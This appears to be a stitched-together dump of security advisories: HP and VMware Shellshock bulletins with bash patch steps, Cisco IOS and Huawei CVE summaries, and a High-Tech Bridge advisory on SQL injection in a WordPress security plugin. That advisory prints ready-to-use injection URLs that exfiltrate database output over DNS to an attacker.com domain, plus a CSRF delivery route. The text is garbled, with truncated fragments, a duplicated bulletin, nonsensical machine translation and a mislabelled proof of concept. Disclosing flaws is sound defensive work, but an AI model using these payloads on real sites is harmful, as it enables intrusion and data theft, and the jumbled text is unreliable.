COMMUNICATION - SECURITY BULLETIN Document ID: c04558068 Version: 1 HPSBMU03246 rev.1 - HP Insight Control for Linux Central Management Server Pre-boot Execution Environment running Bash Shell, Multiple Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-02-02 Last Updated: 2015-02-02 Potential Security Impact: Multiple vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Insight Control for Linux Central Management Server Pre-boot Execution Environment that could be exploited remotely resulting in Denial of Service (DoS), disclosure of information, and other vulnerabilities. References: CVE-2014-6271 CVE-2014-6277 CVE-2014-6278 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 CVE-2014-7196 SSRT101742 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control for Linux Central Management Server Pre-boot Execution Environment running Bash Shell BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7196 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following instructions to resolve these vulnerabilities. Follow these steps to update the HP Insight Control for Linux Central Management Server Pre-boot Execution Environment: NOTE: The following procedure updates the bash shell on the Linux Pre-boot Execution Environment. On the Production RHEL 6.2 OS: a. Prepare temporary directory for Bash update software: # mkdir -p $HOME/tmp/bash # cd $HOME/tmp/bash # pwd <home directory>/tmp/bash b. Download the file 'bash-4.1.2-15.el6_4.2.i686.rpm' for Insight Control for Linux Red Hat 6.2 i386 from https://rhn.redhat.com/errata/RHSA-2014-1311.html to the temporary directory '$HOME/tmp/bash'. c. Extract the Bash update software package. # rpm2cpio bash-4.1.2-15.el6_4.2.i686.rpm| cpio -idmv d. Verify the version of the Bash update software: # ./bin/bash --version GNU bash, version 4.1.2(1)-release (i686-redhat-linux-gnu) e. Verify version dependencies: # ldd ./bin/bash linux-gate.so.1 => (0x008a7000) libtinfo.so.5 => /lib/libtinfo.so.5 (0x00459000) libdl.so.2 => /lib/libdl.so.2 (0x002c0000) libc.so.6 => /lib/libc.so.6 (0x0012e000) /lib/ld-linux.so.2 (0x00108000) f. Create archive file from '/lib' to copy and install on the Insight Control for Linux Central Management Server Pre-boot Execution Environment system: # mkdir $HOME/tmp/lib # cd /lib # cp * $HOME/tmp/lib # cd $HOME/tmp # pwd <home directory>/tmp # tar cvf bash_lib.tar * 2. Download the new archive file '$HOME/tmp/bash_lib.tar' from the Production RHEL 6.2 OS system to the Insight Control for Linux Central Management Server Pre-boot Execution Environment system. On the HP Insight Control for Linux Central Managment Server Pre-boot Execution Environment system: a. Create a temporary folder for the toolkit and copy the toolkit there : # mkdir -p $HOME/tmp/temp-toolkit # cp /usr/share/systemimager/boot/i386/standard/toolkit.tar.gz $HOME/tmp/temp-toolkit b. Extract the file 'toolkit.tar.gz' into the temporary folder: # cd $HOME/tmp/temp-toolkit # tar zxvf toolkit.tar.gz # mv $HOME/tmp/temp-toolkit/toolkit.tar.gz /tmp c. Verify the version of the toolkit Bash: # $HOME/tmp/temp-toolkit/bin/bash --version GNU bash, version 3.2.0(1)-release (i386-pc-linux-gnu) Copyright (C) 2005 Free Software Foundation, Inc. d. Verify dependencies versions: # ldd $HOME/tmp/temp-toolkit/bin/bash linux-gate.so.1 => (0xffffe000) libtermcap.so.2 => /lib/libtermcap.so.2 (0xf7f8c000) libdl.so.2 => /lib/libdl.so.2 (0x008bf000) libc.so.6 => /lib/libc.so.6 (0x00777000) /lib/ld-linux.so.2 (0x00755000) e. Extract the archive 'bash_lib.tar' to directory '$HOME/tmp/bash_lib' . Then copy the bash binary and the library files to their respective locations: # tar xvf $HOME/tmp/bash_lib # cp $HOME/tmp/bash_lib/bash/bash $HOME/tmp/temp-toolkit/bin # cp $HOME/tmp/bash_lib/lib/* $HOME/tmp/temp-toolkit/lib f. Create the updated toolkit gzipped archive file and place in /usr/share/systemimager/boot/i386/standard # tar czvf toolkit.tar.gz * # cp toolkit.tar.gz /usr/share/systemimager/boot/i386/standard HISTORY Version:1 (rev.1) - 2 February 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice

Multiple SQL injection vulnerabilities in the All In One WP Security & Firewall plugin before 3.8.3 for WordPress allow remote authenticated users to execute arbitrary SQL commands via the (1) orderby or (2) order parameter in the aiowpsec page to wp-admin/admin.php. NOTE: this can be leveraged using CSRF to allow remote attackers to execute arbitrary SQL commands. Also, by abusing Cross-Site Request Forgery, a third party can SQL The command may be executed. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. All In One WP Security &amp; Firewall 3.8.2 is vulnerable; other versions may also be affected. WordPress is a set of blogging platform developed by WordPress Software Foundation using PHP language, which supports setting up personal blogging websites on PHP and MySQL servers. Advisory ID: HTB23231 Product: All In One WP Security WordPress plugin Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy Vulnerable Version(s): 3.8.2 and probably prior Tested Version: 3.8.2 Advisory Publication: September 3, 2014 [without technical details] Vendor Notification: September 3, 2014 Vendor Patch: September 12, 2014 Public Disclosure: September 24, 2014 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2014-6242 Risk Level: Medium CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker): http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.: http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker): http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. [2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References

Cisco IOS 12.0, 12.2, 12.4, 15.0, 15.1, 15.2, and 15.3 and IOS XE 2.x and 3.x before 3.7.4S; 3.2.xSE and 3.3.xSE before 3.3.2SE; 3.3.xSG and 3.4.xSG before 3.4.4SG; and 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S allow remote attackers to cause a denial of service (device reload) via malformed RSVP packets, aka Bug ID CSCui11547. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. These issues are being tracked by Cisco Bug ID CSCui11547. The following products and versions are affected: Cisco IOS Release 12.0, Release 12.2, Release 12.4, Release 15.0, Release 15.1, Release 15.2, and Release 15.3, IOS XE 3.7.4S prior to 2.x and 3.x, prior to 3.3.2SE 3.2.xSE and 3.3.xSE, 3.3.xSG and 3.4.xSG before 3.4.4SG, 3.8.xS, 3.9.xS and 3.10.xS before 3.10.1S

The metadata flow feature in Cisco IOS 15.1 through 15.3 and IOS XE 3.3.xXO before 3.3.1XO, 3.6.xS and 3.7.xS before 3.7.6S, and 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S allows remote attackers to cause a denial of service (device reload) via malformed RSVP packets, aka Bug ID CSCug75942. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. This issue is being tracked by Cisco Bug ID CSCug75942. The following products and versions are affected: Cisco IOS Releases 15.1 through 15.3, IOS XE 3.3.xXO prior to 3.3.1XO, 3.6.xS and 3.7.xS prior to 3.7.6S, 3.8.xS and 3.9 prior to 3.10.1S .xS version, 3.10S version

The metadata flow feature in Cisco IOS 15.1 through 15.3 and IOS XE 3.3.xXO before 3.3.1XO, 3.6.xS and 3.7.xS before 3.7.6S, and 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S allows remote attackers to cause a denial of service (device reload) via malformed RSVP packets, aka Bug ID CSCue22753. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. This issue is being tracked by Cisco Bug ID CSCue22753. The following products and versions are affected: Cisco IOS Releases 15.1 through 15.3, IOS XE 3.3.xXO prior to 3.3.1XO, 3.6.xS and 3.7.xS prior to 3.7.6S, 3.8.xS and 3.9 prior to 3.10.1S .xS version, 3.10S version

Cisco IOS 15.0, 15.1, 15.2, and 15.4 and IOS XE 3.3.xSE before 3.3.2SE, 3.3.xXO before 3.3.1XO, 3.5.xE before 3.5.2E, and 3.11.xS before 3.11.1S allow remote attackers to cause a denial of service (device reload) via malformed mDNS packets, aka Bug ID CSCul90866. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. This issue is being tracked by Cisco Bug ID CSCul90866. The following products and versions are affected: Cisco IOS Releases 15.0, 15.1, 15.2, and 15.4, IOS XE 3.3.xSE prior to 3.3.2SE, 3.3.xXO prior to 3.3.1XO, 3.5.xE prior to 3.5.2E and Version 3.11.0S

Memory leak in Cisco IOS 15.0, 15.1, 15.2, and 15.4 and IOS XE 3.3.xSE before 3.3.2SE, 3.3.xXO before 3.3.1XO, 3.5.xE before 3.5.2E, and 3.11.xS before 3.11.1S allows remote attackers to cause a denial of service (memory consumption, and interface queue wedge or device reload) via malformed mDNS packets, aka Bug ID CSCuj58950. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. Cisco IOS and IOS XE software are prone to a remote denial-of-service vulnerability. This issue is being tracked by Cisco Bug ID CSCuj58950. The following products and versions are affected: Cisco IOS Releases 15.0, 15.1, 15.2, and 15.4, IOS XE 3.3.xSE prior to 3.3.2SE, 3.3.xXO prior to 3.3.1XO, 3.5.xE prior to 3.5.2E and Version 3.11.0S

Memory leak in Cisco IOS 15.1 through 15.4 and IOS XE 3.4.xS, 3.5.xS, 3.6.xS, and 3.7.xS before 3.7.6S; 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S; and 3.11.xS before 3.12S allows remote attackers to cause a denial of service (memory consumption or device reload) via malformed DHCPv6 packets, aka Bug ID CSCum90081. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. This issue is being tracked by Cisco Bug ID CSCum90081. The following products and versions are affected: Cisco IOS Releases 15.1 through 15.4, IOS XE 3.7.6S prior to 3.4.xS, 3.5.xS, 3.6.xS and 3.7.xS, 3.10.1S prior to 3.8.xS, 3.9 .xS version and 3.10.xS version, 3.11.xS version before 3.12S

Cisco IOS 12.4 and 15.0 through 15.4 and IOS XE 3.1.xS, 3.2.xS, 3.3.xS, 3.4.xS, 3.5.xS, 3.6.xS, and 3.7.xS before 3.7.6S; 3.8.xS, 3.9.xS, and 3.10.xS before 3.10.1S; and 3.11.xS before 3.12S allow remote attackers to cause a denial of service (device reload) via a crafted SIP message, aka Bug ID CSCul46586. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. This issue is being tracked by Cisco Bug ID CSCul46586. The following products and versions are affected: Cisco IOS Release 15.0 through 15.4, IOS XE prior to 3.7.6S Release 3.1.xS, Release 3.2.xS, Release 3.3.xS, Release 3.4.xS, Release 3.5.xS, Release 3.6.xS and 3.7.xS, 3.8.xS before 3.10.1S, 3.9.xS and 3.10.xS, 3.11.xS before 3.12S

The ALG module in Cisco IOS 15.0 through 15.4 does not properly implement SIP over NAT, which allows remote attackers to cause a denial of service (device reload) via multipart SDP IPv4 traffic, aka Bug ID CSCun54071. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. Cisco IOS Software is prone to a denial-of-service vulnerability. This issue is being tracked by Cisco Bug ID CSCun54071. The vulnerability stems from the fact that the program does not properly handle the translation of IPv4 packets

FusionManager is a management software for hardware devices, virtualization resources, and applications provided by Huawei. Huawei USG is a firewall series device. A cross-site request forgery vulnerability exists in the FusionManager and the Huawei USG series. This allows remote attackers to construct malicious URIs, entice users to resolve, and perform malicious operations in the target user context. Multiple Huawei products are prone to multiple cross-site request-forgery vulnerabilities. Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. QNAP Systems, Inc. Provided by QTS teeth, Turbo NAS for OS is. QTS for, GNU Bash Vulnerability (JVNVU#97219505) caused by OS Command injection vulnerability (CWE-78) Exists. This vulnerability information is based on the Information Security Early Warning Partnership. IPA Report to JPCERT/CC Coordinated with the developer. Reporter : University of Electro-Communications Wakisaka Yuki MrAny application permission OS The command may be executed. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04558068 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04558068 Version: 1 HPSBMU03246 rev.1 - HP Insight Control for Linux Central Management Server Pre-boot Execution Environment running Bash Shell, Multiple Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-02-02 Last Updated: 2015-02-02 Potential Security Impact: Multiple vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Insight Control for Linux Central Management Server Pre-boot Execution Environment that could be exploited remotely resulting in Denial of Service (DoS), disclosure of information, and other vulnerabilities. References: CVE-2014-6271 CVE-2014-6277 CVE-2014-6278 CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 CVE-2014-7196 SSRT101742 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control for Linux Central Management Server Pre-boot Execution Environment running Bash Shell BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-7196 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following instructions to resolve these vulnerabilities. Follow these steps to update the HP Insight Control for Linux Central Management Server Pre-boot Execution Environment: NOTE: The following procedure updates the bash shell on the Linux Pre-boot Execution Environment. Please update the Bash shell version on the HP Insight Control for Linux Central Management Server also. 1. On the Production RHEL 6.2 OS: a. Prepare temporary directory for Bash update software: # mkdir -p $HOME/tmp/bash # cd $HOME/tmp/bash # pwd <home directory>/tmp/bash b. Download the file 'bash-4.1.2-15.el6_4.2.i686.rpm' for Insight Control for Linux Red Hat 6.2 i386 from https://rhn.redhat.com/errata/RHSA-2014-1311.html to the temporary directory '$HOME/tmp/bash'. c. Extract the Bash update software package. # rpm2cpio bash-4.1.2-15.el6_4.2.i686.rpm| cpio -idmv d. Verify the version of the Bash update software: # ./bin/bash --version GNU bash, version 4.1.2(1)-release (i686-redhat-linux-gnu) e. Verify version dependencies: # ldd ./bin/bash linux-gate.so.1 => (0x008a7000) libtinfo.so.5 => /lib/libtinfo.so.5 (0x00459000) libdl.so.2 => /lib/libdl.so.2 (0x002c0000) libc.so.6 => /lib/libc.so.6 (0x0012e000) /lib/ld-linux.so.2 (0x00108000) f. Create archive file from '/lib' to copy and install on the Insight Control for Linux Central Management Server Pre-boot Execution Environment system: # mkdir $HOME/tmp/lib # cd /lib # cp * $HOME/tmp/lib # cd $HOME/tmp # pwd <home directory>/tmp # tar cvf bash_lib.tar * 2. Download the new archive file '$HOME/tmp/bash_lib.tar' from the Production RHEL 6.2 OS system to the Insight Control for Linux Central Management Server Pre-boot Execution Environment system. 3. On the HP Insight Control for Linux Central Managment Server Pre-boot Execution Environment system: a. Create a temporary folder for the toolkit and copy the toolkit there : # mkdir -p $HOME/tmp/temp-toolkit # cp /usr/share/systemimager/boot/i386/standard/toolkit.tar.gz $HOME/tmp/temp-toolkit b. Extract the file 'toolkit.tar.gz' into the temporary folder: # cd $HOME/tmp/temp-toolkit # tar zxvf toolkit.tar.gz # mv $HOME/tmp/temp-toolkit/toolkit.tar.gz /tmp c. Verify the version of the toolkit Bash: # $HOME/tmp/temp-toolkit/bin/bash --version GNU bash, version 3.2.0(1)-release (i386-pc-linux-gnu) Copyright (C) 2005 Free Software Foundation, Inc. d. Verify dependencies versions: # ldd $HOME/tmp/temp-toolkit/bin/bash linux-gate.so.1 => (0xffffe000) libtermcap.so.2 => /lib/libtermcap.so.2 (0xf7f8c000) libdl.so.2 => /lib/libdl.so.2 (0x008bf000) libc.so.6 => /lib/libc.so.6 (0x00777000) /lib/ld-linux.so.2 (0x00755000) e. Extract the archive 'bash_lib.tar' to directory '$HOME/tmp/bash_lib' . Then copy the bash binary and the library files to their respective locations: # tar xvf $HOME/tmp/bash_lib # cp $HOME/tmp/bash_lib/bash/bash $HOME/tmp/temp-toolkit/bin # cp $HOME/tmp/bash_lib/lib/* $HOME/tmp/temp-toolkit/lib f. Create the updated toolkit gzipped archive file and place in /usr/share/systemimager/boot/i386/standard # tar czvf toolkit.tar.gz * # cp toolkit.tar.gz /usr/share/systemimager/boot/i386/standard HISTORY Version:1 (rev.1) - 2 February 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlTP2EgACgkQ4B86/C0qfVnMkQCg8yH4xRTp9ahC3s4vDiCBmKiV JTwAoPl3SC09DPRWwo1zluDWFF1OfMtA =w7+V -----END PGP SIGNATURE----- . This vulnerability allows users that have been granted access to a shell script to escalate privilege and execute unrestricted commands at the same security level as the Bash script. The shell is not accessible via the standard calibration or remote management interfaces. NOTE: Only the Z27x model is vulnerable. The unit provides Calibration Software running on embedded Linux, which includes a Bash Shell. The software is used for service purposes only. This bulletin will be revised when the firmware update is released. vulnerability. HP GNV Website: http://h71000.www7.hp.com/opensource/gnv.html Sourceforge: IA64: https://sourceforge.net/projects/gnv/files/GNV%20-%20I64/V3.0-1/ Alpha: https://sourceforge.net/projects/gnv/files/GNV%20-%20Alpha/V3.0-1/ HP Bash Version for OpenVMS Platform Patch Kit Name v1.14-8 Alpha OpenVMS V8.3, V8.4 HP-AXPVMS-GNV-BASH-V0114-08.ZIP v1.14-8 ITANIUM OpenVMS V8.3, V8.3-1H1, V8.4 HP-AXPVMS-GNV-BASH-V0114-08.ZIP HISTORY Version:1 (rev.1) - 12 January 2015 Initial release Support: For further information, contact normal HP Services support channel. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement." Copyright 2015 Hewlett-Packard Development Company, L.P. Summary VMware product updates address Bash security vulnerabilities. Relevant Releases (Affected products for which remediation is present) vCenter Log Insight 2.0 3. Problem Description a. Bash libraries have been updated in multiple products to resolve multiple critical security issues, also referred to as Shellshock. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifiers CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187 to these issues. VMware products have been grouped into the following four product categories: I) ESXi and ESX Hypervisor ESXi is not affected because ESXi uses the Ash shell (through busybox), which is not affected by the vulnerability reported for the Bash shell. See table 1 for remediation for ESX. II) Windows-based products Windows-based products, including all versions of vCenter Server running on Windows, are not affected. III) VMware (virtual) appliances VMware (virtual) appliances ship with an affected version of Bash. See table 2 for remediation for appliances. IV) Products that run on Linux, Android, OSX or iOS (excluding virtual appliances) Products that run on Linux, Android, OSX or iOS (excluding virtual appliances) might use the Bash shell that is part of the operating system. If the operating system has a vulnerable version of Bash, the Bash security vulnerability might be exploited through the product. VMware recommends that customers contact their operating system vendor for a patch. MITIGATIONS VMware encourages restricting access to appliances through firewall rules and other network layer controls to only trusted IP addresses. This measure will greatly reduce any risk to these appliances. RECOMMENDATIONS VMware recommends customers evaluate and deploy patches for affected products in Table 1 and 2 below as these patches become available. Column 4 of the following tables lists the action required to remediate the vulnerability in each release, if a solution is available. Table 1 - ESXi and ESX Hypervisor ================================= VMware Product Running Replace with/ Product Version on Apply Patch ============== ======= ======= ============= ESXi any ESXi Not affected ESX 4.1 ESX Patch pending * ESX 4.0 ESX Patch pending * * VMware will make VMware ESX 4.0 and 4.1 security patches available for the Bash shell vulnerability. This security patch release is an exception to the existing VMware lifecycle policy. Table 2 - Products that are shipped as a (virtual) appliance. ============================================================= VMware Product Running Replace with/ Product Version on Apply Patch ============== ======= ======= ============= vCenter Server Appliance 5.x Linux Patch Pending Horizon DaaS Platform 6.x Linux Patch Pending Horizon Workspace 1.x, 2.x Linux Patch Pending IT Business Management Suite 1.x Linux Patch Pending NSX for Multi-Hypervisor 4.x Linux Patch Pending NSX for vSphere 6.x Linux Patch Pending NVP 3.x Linux Patch Pending vCenter Converter Standalone 5.x Linux Patch Pending vCenter Hyperic Server 5.x Linux Patch Pending vCenter Infrastructure Navigator 5.x Linux Patch Pending vCenter Log Insight 1.x, 2.x Linux 2.0 U1 vCenter Operations Manager 5.x Linux Patch Pending vCenter Orchestrator Appliance 4.x, 5.x Linux Patch Pending vCenter Site Recovery Manager 5.x Linux Patch Pending ** vCenter Support Assistant 5.x Linux Patch Pending vCloud Automation Center 6.x Linux Patch Pending vCloud Automation Center Application Services 6.x Linux Patch Pending vCloud Director Appliance 5.x Linux Patch Pending vCloud Connector 2.x Linux Patch Pending vCloud Networking and Security 5.x Linux Patch Pending vCloud Usage Meter 3.x Linux Patch Pending vFabric Application Director 5.x, 6.x Linux Patch Pending vFabric Postgres 9.x Linux Patch Pending Viewplanner 3.x Linux Patch Pending VMware Application Dependency Planner x.x Linux Patch Pending VMware Data Recovery 2.x Linux Patch Pending VMware HealthAnalyzer 5.x Linux Patch Pending VMware Mirage Gateway 5.x Linux Patch Pending VMware Socialcast On Premise x.x Linux Patch Pending VMware Studio 2.x Linux Patch Pending VMware TAM Data Manager x.x Linux Patch Pending VMware Workbench 3.x Linux Patch Pending vSphere App HA 1.x Linux Patch Pending vSphere Big Data Extensions 1.x, 2.x Linux Patch Pending vSphere Data Protection 5.x Linux Patch Pending vSphere Management Assistant 5.x Linux Patch Pending vSphere Replication 5.x Linux Patch Pending 